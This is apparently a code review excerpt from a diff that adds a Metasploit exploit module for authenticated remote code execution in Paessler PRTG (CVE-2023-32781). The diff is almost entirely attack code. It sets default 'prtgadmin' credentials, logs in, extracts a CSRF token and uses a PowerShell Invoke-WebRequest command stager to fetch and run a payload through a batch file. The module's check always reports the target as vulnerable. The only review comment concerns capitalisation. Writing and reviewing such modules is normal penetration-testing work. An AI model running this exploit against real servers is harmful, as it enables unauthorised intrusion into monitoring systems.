modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb

```diff
@@ -0,0 +1,301 @@
+        'Description' => %q{
+          Authenticated RCE in Paessler PRTG
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],
+        'References' => [
+          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],
+          [ 'CVE', '2023-32781']
+        ],
+        'DisclosureDate' => '2023-08-09',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 0 # Schedules takes some time to run
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'URI',
+          [ true, 'The URI for the PRTG web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  def check
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    connect
+
+    execute_cmdstager(flavor: :psh_invokewebrequest)
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status('Running PRTG RCE exploit')
+    authenticate_prtg
+    bat_file_name = write_bat_file_to_disk(cmd)
+    run_bat_file_from_disk(bat_file_name)
+    print_status('Exploit done')
+    handler
+  end
+
+  def authenticate_prtg
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['URI'], 'public', 'checklogin.htm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+    unless res
+      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')
+    end
+    if res && res.code == 302 && res.get_cookies('Set-Cookie')
+      print_good('Successfully authenticated against PRTG')
+    else
+      fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')
+    end
+  end
+
+  def get_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['URI'], 'welcome.htm'),
+      'keep_cookies' => true
+    })
+
+    if res.nil? || res.body.nil?
+      fail_with(Failure::NoAccess, 'Page with CSRF token not available')
+    end
+
+    regex = /csrf-token" content="([^"]+)"/
+    token = res.body[regex, 1]
+
+    print_status("Extracted csrf token: #{token}")
```

Comment:
CSRF is an acronym and you specify it in all caps above so it should be consistent.

```suggestion
    print_status("Extracted CSRF token: #{token}")
```